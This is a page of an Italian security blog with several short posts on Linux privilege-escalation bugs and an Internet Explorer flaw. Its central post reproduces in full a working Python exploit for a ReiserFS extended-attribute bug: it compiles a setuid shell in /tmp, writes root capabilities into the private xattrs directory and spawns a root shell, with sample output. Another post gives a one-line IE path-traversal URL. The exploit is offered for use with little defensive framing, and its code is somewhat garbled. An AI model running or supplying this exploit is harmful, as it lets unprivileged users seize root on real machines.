Menu Principale
Statistiche
Utenti : 13
Contenuti : 35
Link web : 6
Tot. visite contenuti : 4843
Login



Home

Privileges Escalation 9.04

PostDateIcon Martedì 18 Maggio 2010 12:37 | PostAuthorIcon Author: Vincenzi Massimo | PDF Stampa E-mail

Privileges Escalation on Ubuntu 9.04

Kernel 2.6.28-15


Questa volta l'errore si trova in PulseAudio.
Eh già è grave questa cosa...
Questo BUG permette a qualsiasi utente di ottenere una shell di root.
Il codice sorgente verrà pubblicato a breve, appena si troverà una soluzione al bug.

Per ulteriori info - Questo indirizzo e-mail è protetto dallo spam bot. Abilita Javascript per vederlo.

 

Un altro privileges escalation 9.10JJ

PostDateIcon Lunedì 17 Maggio 2010 15:03 | PostAuthorIcon Author: Vincenzi Massimo | PDF Stampa E-mail
Ebbene si... Trovato un altro bug nella distribuzione GNU/Linux Ubuntu 9.10 JJ
Vediamolo nello specifico:

#!/usr/bin/env python


Information:

https://bugzilla.redhat.com/show_bug.cgi?id=568041

The kernel allows processes to access the internal ".reiserfs_priv"
directory at the top of a reiserfs filesystem which is used to store
xattrs. Permissions are not enforced in that tree, so unprivileged
users can view and potentially modify the xattrs on arbitrary files.

Usage:

$ python team-edward.py
[+] checking for reiserfs mount with user_xattr mount option
[+] checking for private xattrs directory at /.reiserfs_priv/xattrs
[+] preparing shell in /tmp
[+] capturing pre-shell snapshot of private xattrs directory
[+] compiling shell in /tmp
[+] setting dummy xattr to get reiserfs object id
[+] capturing post-shell snapshot of private xattrs directory
[+] found 1 new object ids
[+] setting cap_setuid/cap_setgid capabilities on object id 192B.1468
[+] spawning setuid shell...
# id
uid=0(root) gid=0(root) groups=4(adm), ...

Notes:

Obviously requires a ReiserFS filesystem mounted with extended attributes.
Tested on Ubuntu Jaunty 9.10.
'''
import os, sys

SHELL = 'int main(void) { setgid(0); setuid(0); execl("/bin/sh", "sh", 0); }'
XATTR =
'\x41\x58\x46\x52\xc1\x00\x00\x02\x01\x00\x00\x0
\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'

def err(txt):
print '[-] error: %s' % txt
sys.exit(1)

def msg(txt):
print '[+] %s' % txt

def main():
msg('checking for reiserfs mount with user_xattr mount option')

f = open('/etc/fstab')
for line in f:
if 'reiserfs' in line and 'user_xattr' in line:
break
else:
err('failed to find a reiserfs mount with user_xattr')
f.close()

msg('checking for private xattrs directory at /.reiserfs_priv/xattrs')

if not os.path.exists('/.reiserfs_priv/xattrs'):
err('failed to locate private xattrs directory')

msg('preparing shell in /tmp')

f = open('/tmp/team-edward.c', 'w')
f.write(SHELL)
f.close()

msg('capturing pre-shell snapshot of private xattrs directory')

pre = set(os.listdir('/.reiserfs_priv/xattrs'))

msg('compiling shell in /tmp')

ret = os.system('gcc -w /tmp/team-edward.c -o /tmp/team-edward')
if ret != 0:
err('error compiling shell, you need gcc')

msg('setting dummy xattr to get reiserfs object id')

os.system('setfattr -n "user.hax" -v "hax" /tmp/team-edward')
if ret != 0:
err('error setting xattr, you need setfattr')

msg('capturing post-shell snapshot of private xattrs directory')

post = set(os.listdir('/.reiserfs_priv/xattrs'))

objs = post.difference(pre)

msg('found %s new object ids' % len(objs))

for obj in objs:
msg('setting cap_setuid/cap_setgid capabilities on object id %s' % obj)

f = open('/.reiserfs_priv/xattrs/%s/security.capability' % obj, 'w')
f.write(XATTR)
f.close()

msg('spawning setuid shell...')

os.system('/tmp/team-edward')

if __name__ == '__main__':
main()

Ultimo aggiornamento ( Lunedì 17 Maggio 2010 15:08 )

 

Vulnerabilità IE6-7-8

PostDateIcon Domenica 16 Maggio 2010 19:26 | PostAuthorIcon Author: Vincenzi Massimo | PDF Stampa E-mail

Internet Explorer ancora pieno di falle


IL browser di Microsoft questa volta ne ha combinata un'altra:
digitate sulla barra degli indirizzi di internet explorer:

handler:handler#:../../../../C:\windows/system32/calc.exe

e sorpresa.... :) Vi chiede di scaricare calc.exe !!!!
Pensate ad un sito abilmente creato che lanci questa opzione sul vostro computer,
magari un bat che apra una determinata porta di comunicazione.
Consiglio: Passate a Firefox o Chrome !!!
 

Privileges Escalation

PostDateIcon Domenica 16 Maggio 2010 19:05 | PostAuthorIcon Author: Vincenzi Massimo | PDF Stampa E-mail

Bug Trovato nella versione di sudo < 1.6.9p18

Il bug in oggetto permette il privileges escalation di un utente a root.
Un consiglio: AGGIORNATE SUBITO LA VERSIONE DI SUDO.
Nel frattempo stò mettendo sotto torchio il sistema si sicurezza SElinux.
A breve potrebbero giungere notizie :)
 

xmarks

PostDateIcon Lunedì 03 Maggio 2010 13:29 | PostAuthorIcon Author: Vincenzi Massimo | PDF Stampa E-mail

xMarks


Un ottimo plugin per Firefox, Internet Explorer, Google Chrome, e Safari.
Una volta installato permette di fare un backup in remoto di tutti i dati personali del browser.
Le password verranno salvate in modo crittografato, garantendo la massima sicurezza.
Provatelo !!!! xMarks
 

<< Inizio < Prec. 1 2 3 4 5 Succ. > Fine >>

Pagina 3 di 5

feed-image

Copyright © 2009 ---.
All Rights Reserved.

info@steblar.com